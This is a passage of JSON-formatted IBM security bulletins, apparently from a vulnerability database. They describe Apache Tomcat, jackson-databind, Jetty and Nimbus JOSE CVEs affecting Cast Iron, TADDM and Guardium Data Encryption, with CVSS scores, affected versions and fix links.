"814A42F376BD84EA7C321ADD0697620A9CCFB64AA5053D864D6575D7386F0CD1", "href": "https://www.ibm.com/support/pages/node/888259", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-02-24T01:38:49", "description": "## Summary\n\nIBM WebSphere Cast Iron Solution & App Connect Professional has addressed the following vulnerabilities reported in Apache Tomcat.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2019-0221](<https://vulners.com/cve/CVE-2019-0221>) \n** DESCRIPTION: **The SSI printenv command in Apache Tomcat 9.0.0.M1 to 9.0.0.17, 8.5.0 to 8.5.39 and 7.0.0 to 7.0.93 echoes user provided data without escaping and is, therefore, vulnerable to XSS. SSI is disabled by default. The printenv command is intended for debugging and is unlikely to be present in a production website. \nCVSS Base score: 6.1 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/161746](<https://exchange.xforce.ibmcloud.com/vulnerabilities/161746>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)\n\n## Affected Products and Versions\n\nWebSphere Cast Iron v 7.5.0.0, 7.5.0.1, 7.5.1.0\n\nWebSphere Cast Iron v 7.0.0.0, 7.0.0.1, 7.0.0.2\n\nApp Connect Professional v 7.5.2.0\n\nApp Connect Professional v 7.5.3.0\n\n \n\n\n## Remediation/Fixes\n\n## \n\n_Product_| _VRMF_| _APAR_| _Remediation/First Fix_ \n---|---|---|--- \nIBM Cast Iron| 7.0.0.0 \n7.0.0.1 \n7.0.0.2| LI80954| [7002 Fixcentral Link](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~WebSphere&product=ibm/WebSphere/WebSphere+Cast+Iron+Cloud+integration&release=7.0.0.2&platform=All&function=fixId&fixids=7.0.0.2-WS-WCI-20190724-0516_H8_64-CUMUIFIX-045.scrypt2,7.0.0.2-WS-WCI-20190724-0516_H8_64-CUMUIFIX-045.vcrypt2,7.0.0.2-WS-WCI-20190724-0516_H8_64-CUMUIFIX-045.32bit.sc-linux,7.0.0.2-WS-WCI-20190724-0516_H8_64-CUMUIFIX-045.32bit.sc-win,7.0.0.2-WS-WCI-20190724-0516_H8_64-CUMUIFIX-045.sc-linux,7.0.0.2-WS-WCI-20190724-0516_H8_64-CUMUIFIX-045.sc-win,7.0.0.2-WS-WCI-20190724-0543_H7_64-CUMUIFIX-045.32bit.studio,7.0.0.2-WS-WCI-20190724-0543_H7_64-CUMUIFIX-045.studio&includeSupersedes=0> \"7002 Fixcentral Link\" ) \nIBM Cast Iron| 7.5.0.0 \n7.5.0.1 \n7.5.1.0| LI80954| [7510 fixcentral Link](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~WebSphere&product=ibm/WebSphere/WebSphere+Cast+Iron+Cloud+integration&release=7.5.1.0&platform=All&function=fixId&fixids=7.5.1.0-WS-WCI-20191018-0703_H7_64-CUMUIFIX-024.scrypt2,7.5.1.0-WS-WCI-20191018-0703_H7_64-CUMUIFIX-024.vcrypt2,7.5.1.0-WS-WCI-20190723-2038_H7_64-CUMUIFIX-024.32bit.sc-linux,7.5.1.0-WS-WCI-20190723-2038_H7_64-CUMUIFIX-024.sc-linux,7.5.1.0-WS-WCI-20190723-2038_H7_64-CUMUIFIX-024.32bit.sc-win,7.5.1.0-WS-WCI-20190723-2038_H7_64-CUMUIFIX-024.sc-win,7.5.1.0-WS-WCI-20191018-0703_H7_64-CUMUIFIX-024.docker,7.5.1.0-WS-WCI-20190723-2039_H8_64-CUMUIFIX-024.32bit.studio,7.5.1.0-WS-WCI-20190723-2039_H8_64-CUMUIFIX-024.studio&includeSupersedes=0> \"7510 fixcentral Link\" ) \nApp Connect Professional| 7.5.2.0| LI80954| [7520 Fixcentral link](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~WebSphere&product=ibm%2FWebSphere%2FApp+Connect+Professional&release=7.5.2.0&platform=All&function=fixId&fixids=7.5.2.0-WS-ACP-20190620-0934_H15_64-CUMUIFIX-015.vcrypt2,7.5.2.0-WS-ACP-20190620-0934_H15_64-CUMUIFIX-015.32bit.sc-linux,7.5.2.0-WS-ACP-20190620-0934_H15_64-CUMUIFIX-015.32bit.sc-win,7.5.2.0-WS-ACP-20190620-0934_H15_64-CUMUIFIX-015.sc-linux,7.5.2.0-WS-ACP-20190620-0934_H15_64-CUMUIFIX-015.sc-win,7.5.2.0-WS-ACP-20190620-0934_H15_64-CUMUIFIX-015.docker,7.5.2.0-WS-ACP-20190620-0958_H9_64-CUMUIFIX-015.32bit.studio,7.5.2.0-WS-ACP-20190620-0958_H9_64-CUMUIFIX-015.studio&includeSupersedes=0> \"7520 Fixcentral link\" ) \nApp Connect Professional| 7.5.3.0| LI80954| [7530 Fixcentral link](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~WebSphere&product=ibm%2FWebSphere%2FApp+Connect+Professional&release=7.5.3.0&platform=All&function=fixId&fixids=7.5.3.0-WS-ACP-20190620-1152_H15_64-CUMUIFIX-003.vcrypt2,7.5.3.0-WS-ACP-20190620-1152_H15_64-CUMUIFIX-003.32bit.sc-linux,7.5.3.0-WS-ACP-20190620-1152_H15_64-CUMUIFIX-003.32bit.sc-win,7.5.3.0-WS-ACP-20190620-1152_H15_64-CUMUIFIX-003.sc-linux,7.5.3.0-WS-ACP-20190620-1152_H15_64-CUMUIFIX-003.sc-win,7.5.3.0-WS-ACP-20190620-1152_H15_64-CUMUIFIX-003.docker,7.5.3.0-WS-ACP-20190620-1152_H15_64-CUMUIFIX-003.builtDockerImage,7.5.3.0-WS-ACP-20190620-1056_H7_64-CUMUIFIX-003.32bit.studio,7.5.3.0-WS-ACP-20190620-1056_H7_64-CUMUIFIX-003.studio&includeSupersedes=0> \"7530 Fixcentral link\" ) \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2020-01-10T07:16:39", "type": "ibm", "title": "Security Bulletin: IBM WebSphere Cast Iron Solution & App Connect Professional is affected by Apache Tomcat vulnerabilities.", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0221"], "modified": "2020-01-10T07:16:39", "id": "2325D4266908D6E2E1036A3CB699E90414BA7A130ECC4A96E48EFAA7D1ABBDB2", "href": "https://www.ibm.com/support/pages/node/1170622", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-02-23T21:41:28", "description": "## Summary\n\nMultiple vulnerabilities in Open Source Apache Tomcat reported by The Apache Software Foundation affect IBM Tivoli Application Dependency Discovery Manager\n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2019-0232_](<https://vulners.com/cve/CVE-2019-0232>) \n**DESCRIPTION:** Apache Tomcat could allow a remote attacker to execute arbitrary code on the system, caused by an error in the way JRE passes command-line arguments when enableCmdLineArguments is enabled. By sending a specially-crafted request, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base Score: 9.8 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/159398_](<https://urldefense.proofpoint.com/v2/url?u=https-3A__exchange.xforce.ibmcloud.com_vulnerabilities_159398&d=DwMFAg&c=cxWN2QSDopt5SklNfbjIjg&r=UEAJ_0JWNtKr6ioRenoohO8bQX4YtTjPY-iUsjuaQcE&m=z80hrEOvBW5hdBknV6BjqJ0KD18j08VMoSe-6_nDICM&s=hNxSNxO7lcNy2uFIwQwlhip8vdVrHAazF_G_Ao7bu6U&e=>) for more information \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N)\n\n \n**CVEID:** [_CVE-2019-0221_](<https://vulners.com/cve/CVE-2019-0221>) \n**DESCRIPTION:** Apache Tomcat is vulnerable to cross-site scripting, caused by improper validation of user-supplied input by the SSI printenv command. A remote attacker could exploit this vulnerability to execute script in a victim's Web browser within the security context of the hosting Web site, once the URL is clicked. An attacker could use this vulnerability to steal the victim's cookie-based authentication credentials. \nCVSS Base Score: 6.1 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/161746_](<https://urldefense.proofpoint.com/v2/url?u=https-3A__exchange.xforce.ibmcloud.com_vulnerabilities_159398&d=DwMFAg&c=cxWN2QSDopt5SklNfbjIjg&r=UEAJ_0JWNtKr6ioRenoohO8bQX4YtTjPY-iUsjuaQcE&m=z80hrEOvBW5hdBknV6BjqJ0KD18j08VMoSe-6_nDICM&s=hNxSNxO7lcNy2uFIwQwlhip8vdVrHAazF_G_Ao7bu6U&e=>) for more information \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)\n\n## Affected Products and Versions\n\nTADDM 7.2.2.0 - 7.2.2.5 \nTADDM 7.3.0.0 (TADDM 7.3.0.1-5 - not affected - they use WebSphere Liberty Profile)\n\n## Remediation/Fixes\n\nBelow are eFixes prepared on top of the latest 7.2.2 FP5 level and 7.3.0.0 (7.3.0.1+ not affected);\n\n**Fix** | **VRMF** | **APAR** | **How to acquire fix** \n---|---|---|--- \n \nefix_Taddm730_tomcat7094_201411291020.zip\n\n| 7.3.0.0 | None | [Download eFix](<https://www.secure.ecurep.ibm.com/download/?id=be11OV07WIteofCmMYJ7GrvMIOiQAzh5OxFhT2m6cHU>) \nefix_Taddm7225_tomcat7094_FP520160209.zip | 7.2.2.5 | None | [Download eFix](<https://www.secure.ecurep.ibm.com/download/?id=2fNGWGUbLDckqyitH9Okk7jwefevJkH0eNrUzv9MF4s>) \n \n \nPlease get familiar with eFix readme in etc/<efix_name>_readme.txt \nNote that the eFix requires manual deletion of the external/apache-tomcat directory.\n\n## ", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-01-13T12:45:37", "type": "ibm", "title": "Security Bulletin: Open Source Apache Tomcat vulnerabilities affect IBM Tivoli Application Dependency Discovery Manager (TADDM) (CVE-2019-0232, CVE-2019-0221)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0221", "CVE-2019-0232"], "modified": "2020-01-13T12:45:37", "id": "3443CFC39DFCA9DB7D36765185173FAE8A5DE1BFF01B1EC7DB085184AA97ABAE", "href": "https://www.ibm.com/support/pages/node/883578", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-27T21:51:50", "description": "## Summary\n\nThere are multiple vulnerabilities identified in IBM Guardium Data Encryption (GDE) .These vulnerabilities have been fixed in GDE 4.0.0.3. Please apply the latest version for the fixes.\n\n## Vulnerability Details\n\n**CVEID: **[CVE-2019-4697](<https://vulners.com/cve/CVE-2019-4697>) \n**DESCRIPTION: **IBM Guardium Data Encryption (GDE) stores user credentials in plain in clear text which can be read by an authenticated user. \nCVSS Base score: 5.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/171928](<https://exchange.xforce.ibmcloud.com/vulnerabilities/171928>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N) \n \n**CVEID: **[CVE-2019-12814](<https://vulners.com/cve/CVE-2019-12814>) \n**DESCRIPTION: **FasterXML jackson-databind could allow a remote attacker to obtain sensitive information, caused by a polymorphic typing issue. By sending a specially-crafted JSON message, an attacker could exploit this vulnerability to read arbitrary local files on the server. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/162875](<https://exchange.xforce.ibmcloud.com/vulnerabilities/162875>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N) \n \n**CVEID: **[CVE-2019-12384](<https://vulners.com/cve/CVE-2019-12384>) \n**DESCRIPTION: **FasterXML jackson-databind could allow a remote attacker to execute arbitrary code on the system, caused by the failure to block the logback-core class from polymorphic deserialization. By sending a specially-crafted JSON message, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/162849](<https://exchange.xforce.ibmcloud.com/vulnerabilities/162849>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) \n \n**CVEID: **[CVE-2019-12086](<https://vulners.com/cve/CVE-2019-12086>) \n**DESCRIPTION: **FasterXML jackson-databind could allow a remote attacker to obtain sensitive information, caused by a Polymorphic Typing issue that occurs due to missing com.mysql.cj.jdbc.admin.MiniAdmin validation. By sending a specially-crafted JSON message, a remote attacker could exploit this vulnerability to read arbitrary local files on the server. \nCVSS Base score: 5.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/161256](<https://exchange.xforce.ibmcloud.com/vulnerabilities/161256>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N) \n \n**CVEID: **[CVE-2018-19362](<https://vulners.com/cve/CVE-2018-19362>) \n**DESCRIPTION: **An unspecified error with failure to block the jboss-common-core class from polymorphic deserialization in FasterXML jackson-databind has an unknown impact and attack vector. \nCVSS Base score: 5.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/155093](<https://exchange.xforce.ibmcloud.com/vulnerabilities/155093>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N) \n \n**CVEID: **[CVE-2018-19361](<https://vulners.com/cve/CVE-2018-19361>) \n**DESCRIPTION: **An unspecified error with failure to block the openjpa class from polymorphic deserialization in FasterXML jackson-databind has an unknown impact and attack vector. \nCVSS Base score: 5.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/155092](<https://exchange.xforce.ibmcloud.com/vulnerabilities/155092>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N) \n \n**CVEID: **[CVE-2018-19360](<https://vulners.com/cve/CVE-2018-19360>) \n**DESCRIPTION: **An unspecified error with failure to block the axis2-transport-jms class from polymorphic deserialization in FasterXML jackson-databind has an unknown impact and attack vector. \nCVSS Base score: 5.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/155091](<https://exchange.xforce.ibmcloud.com/vulnerabilities/155091>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N) \n \n**CVEID: **[CVE-2018-14721](<https://vulners.com/cve/CVE-2018-14721>) \n**DESCRIPTION: **FasterXML jackson-databind is vulnerable to server-side request forgery, caused by the failure to block the axis2-jaxws class from polymorphic deserialization. A remote authenticated attacker could exploit this vulnerability to obtain sensitive data. \nCVSS Base score: 5.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/155136](<https://exchange.xforce.ibmcloud.com/vulnerabilities/155136>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N) \n \n**CVEID: **[CVE-2018-14720](<https://vulners.com/cve/CVE-2018-14720>) \n**DESCRIPTION: **FasterXML jackson-databind could allow a remote attacker to obtain sensitive information, caused by an XML external entity (XXE) error when processing XML data by JDK classes. By sending a specially-crafted XML data. A remote attacker could exploit this vulnerability to obtain sensitive information. \nCVSS Base score: 5.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/155137](<https://exchange.xforce.ibmcloud.com/vulnerabilities/155137>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N) \n \n**CVEID: **[CVE-2018-14719](<https://vulners.com/cve/CVE-2018-14719>) \n**DESCRIPTION: **FasterXML jackson-databind could allow a remote attacker to execute arbitrary code on the system, caused by the failure to block the blaze-ds-opt and blaze-ds-core classes from polymorphic deserialization. An attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/155138](<https://exchange.xforce.ibmcloud.com/vulnerabilities/155138>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) \n \n**CVEID: **[CVE-2018-1000873](<https://vulners.com/cve/CVE-2018-1000873>) \n**DESCRIPTION: **FasterXML jackson-databind is vulnerable to a denial of service, caused by improper input validation by the nanoseconds time value field. By persuading a victim to deserialize specially-crafted input, a remote attacker could exploit this vulnerability to cause the application to crash. \nCVSS Base score: 5.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/154804](<https://exchange.xforce.ibmcloud.com/vulnerabilities/154804>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L) \n \n**CVEID: **[CVE-2019-4691](<https://vulners.com/cve/CVE-2019-4691>) \n**DESCRIPTION: **IBM Guardium Data Encryption (GDE) is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. \nCVSS Base score: 5.4 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/171828](<https://exchange.xforce.ibmcloud.com/vulnerabilities/171828>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N) \n \n**CVEID: **[CVE-2019-4694](<https://vulners.com/cve/CVE-2019-4694>) \n**DESCRIPTION: **IBM Guardium Data Encryption (GDE) contains hard-coded credentials, such as a password or cryptographic key, which it uses for its own inbound authentication, outbound communication to external components, or encryption of internal data. \nCVSS Base score: 6.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/171832](<https://exchange.xforce.ibmcloud.com/vulnerabilities/171832>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:N/A:N) \n \n**CVEID: **[CVE-2017-12974](<https://vulners.com/cve/CVE-2017-12974>) \n**DESCRIPTION: **Connect2id Nimbus JOSE+JWT could provide weaker than expected security, caused by proceeding with ECKey construction without ensuring that the public x and y coordinates are on the specified curve. A remote attacker could exploit this vulnerability to conduct an Invalid Curve Attack. \nCVSS Base score: 7.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/130788](<https://exchange.xforce.ibmcloud.com/vulnerabilities/130788>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L) \n \n**CVEID: **[CVE-2017-12973](<https://vulners.com/cve/CVE-2017-12973>) \n**DESCRIPTION: **Connect2id Nimbus JOSE+JWT could provide weaker than expected security, caused by proceeding improperly after detection of an invalid HMAC in authenticated AES-CBC decryption. A remote attacker could exploit this vulnerability to conduct a padding oracle attack. \nCVSS Base score: 5.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/130789](<https://exchange.xforce.ibmcloud.com/vulnerabilities/130789>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N) \n \n**CVEID: **[CVE-2017-12972](<https://vulners.com/cve/CVE-2017-12972>) \n**DESCRIPTION: **Connect2id Nimbus JOSE+JWT could provide weaker than expected security, caused by the lack of integer-overflow check when converting length values from bytes to bits. A remote attacker could exploit this vulnerability to conduct a HMAC bypass attack. \nCVSS Base score: 5.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/130790](<https://exchange.xforce.ibmcloud.com/vulnerabilities/130790>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N) \n \n**CVEID: **[CVE-2019-4699](<https://vulners.com/cve/CVE-2019-4699>) \n**DESCRIPTION: **IBM Guardium Data Encryption (GDE) generates an error message that includes sensitive information about its environment, users, or associated data. \nCVSS Base score: 2.7 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/171931](<https://exchange.xforce.ibmcloud.com/vulnerabilities/171931>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N) \n \n**CVEID: **[CVE-2019-4688](<https://vulners.com/cve/CVE-2019-4688>) \n**DESCRIPTION: **IBM Guardium Data Encryption (GDE) does not set the secure attribute on authorization tokens or session cookies. Attackers may be able to get the cookie values by sending a http:// link to a user or by planting this link in a site the user goes to. The cookie will be sent to the insecure link and the attacker can then obtain the cookie value by snooping the traffic. \nCVSS Base score: 3.7 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/171825](<https://exchange.xforce.ibmcloud.com/vulnerabilities/171825>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N) \n \n**CVEID: **[CVE-2019-10247](<https://vulners.com/cve/CVE-2019-10247>) \n**DESCRIPTION: **Eclipse Jetty could allow a remote attacker to obtain sensitive information, caused by a flaw in the DefaultHandler. By sending a specially-crafted request, a remote attacker could exploit this vulnerability to obtain sensitive information. \nCVSS Base score: 5.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/160610](<https://exchange.xforce.ibmcloud.com/vulnerabilities/160610>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N) \n \n**CVEID: **[CVE-2019-10241](<https://vulners.com/cve/CVE-2019-10241>) \n**DESCRIPTION: **Eclipse Jetty is vulnerable to cross-site scripting, caused by improper validation of user-supplied input by the DefaultServlet and ResourceHandler. A remote attacker could exploit this vulnerability using a specially-crafted URL to execute script in a victim's Web browser within the security context of the hosting Web site, once the URL is clicked. An attacker could use this vulnerability to steal the victim's cookie-based authentication credentials. \nCVSS Base score: 6.1 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/160676](<https://exchange.xforce.ibmcloud.com/vulnerabilities/160676>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N) \n \n**CVEID: **[CVE-2018-12536](<https://vulners.com/cve/CVE-2018-12536>) \n**DESCRIPTION: **Eclipse Jetty could allow a remote attacker to obtain sensitive information. An attacker could send a specially-crafted URL request to the java.nio.file.InvalidPathException function using an invalid parameter to cause an error message to be returned containing the full installation path. An attacker could use this information to launch further attacks against the affected system. \nCVSS Base score: 5.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/145523](<https://exchange.xforce.ibmcloud.com/vulnerabilities/145523>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N) \n \n**CVEID: **[CVE-2017-9735](<https://vulners.com/cve/CVE-2017-9735>) \n**DESCRIPTION: **Jetty could allow a remote attacker to obtain sensitive information, caused by a timing channel flaw in util/security/Password.java. By observing elapsed times before rejection of incorrect passwords, an attacker could exploit this vulnerability to obtain access information. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/127842](<https://exchange.xforce.ibmcloud.com/vulnerabilities/127842>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N) \n \n**CVEID: **[CVE-2017-7658](<https://vulners.com/cve/CVE-2017-7658>) \n**DESCRIPTION: **Eclipse Jetty is vulnerable to HTTP request smuggling, caused by a flaw when handling more than one Content-Length headers. By sending a specially-crafted request, an attacker could exploit this vulnerability to poison the web cache, bypass web application firewall protection, and conduct XSS attacks. \nCVSS Base score: 6.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/145522](<https://exchange.xforce.ibmcloud.com/vulnerabilities/145522>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N) \n \n**CVEID: **[CVE-2017-7657](<https://vulners.com/cve/CVE-2017-7657>) \n**DESCRIPTION: **Eclipse Jetty is vulnerable to HTTP request smuggling, caused by improper handling of Chunked Transfer-Encoding chunk size. By sending a specially-crafted request, an attacker could exploit this vulnerability to poison the web cache, bypass web application firewall protection, and conduct XSS attacks. \nCVSS Base score: 6.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/145521](<https://exchange.xforce.ibmcloud.com/vulnerabilities/145521>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N) \n \n**CVEID: **[CVE-2017-7656](<https://vulners.com/cve/CVE-2017-7656>) \n**DESCRIPTION: **Eclipse Jetty is vulnerable to HTTP request smuggling, caused by a flaw in the HTTP/1.x Parser. By sending a specially-crafted request, an attacker could exploit this vulnerability to poison the web cache, bypass web application firewall protection, and conduct XSS attacks. \nCVSS Base score: 6.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/145520](<https://exchange.xforce.ibmcloud.com/vulnerabilities/145520>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N) \n \n**CVEID: **[CVE-2019-10072](<https://vulners.com/cve/CVE-2019-10072>) \n**DESCRIPTION: **Apache Tomcat is vulnerable to a denial of service, caused by HTTP/2 connection window exhaustion on write. By failing to send WINDOW_UPDATE messages, a remote attacker could exploit this vulnerability to block threads on the server and cause a denial of service. \nCVSS Base score: 5.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/162806](<https://exchange.xforce.ibmcloud.com/vulnerabilities/162806>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L) \n \n**CVEID: **[CVE-2019-0232](<https://vulners.com/cve/CVE-2019-0232>) \n**DESCRIPTION: **Apache Tomcat could allow a remote attacker to execute arbitrary code on the system, caused by an error in the way JRE passes command-line arguments when enableCmdLineArguments is enabled. By sending a specially-crafted request, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/159398](<https://exchange.xforce.ibmcloud.com/vulnerabilities/159398>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) \n \n**CVEID: **[CVE-2019-0221](<https://vulners.com/cve/CVE-2019-0221>) \n**DESCRIPTION: **Apache Tomcat is vulnerable to cross-site scripting, caused by improper validation of user-supplied input by the SSI printenv command. A remote attacker could exploit this vulnerability to execute script in a victim's Web browser within the security context of the hosting Web site, once the URL is clicked. An attacker could use this vulnerability to steal the victim's cookie-based authentication credentials. \nCVSS Base score: 6.1 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/161746](<https://exchange.xforce.ibmcloud.com/vulnerabilities/161746>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N) \n \n**CVEID: **[CVE-2019-0199](<https://vulners.com/cve/CVE-2019-0199>) \n**DESCRIPTION: **Apache Tomcat is vulnerable to a denial of service, caused by the acceptance of streams with excessive numbers of SETTINGS frames and the 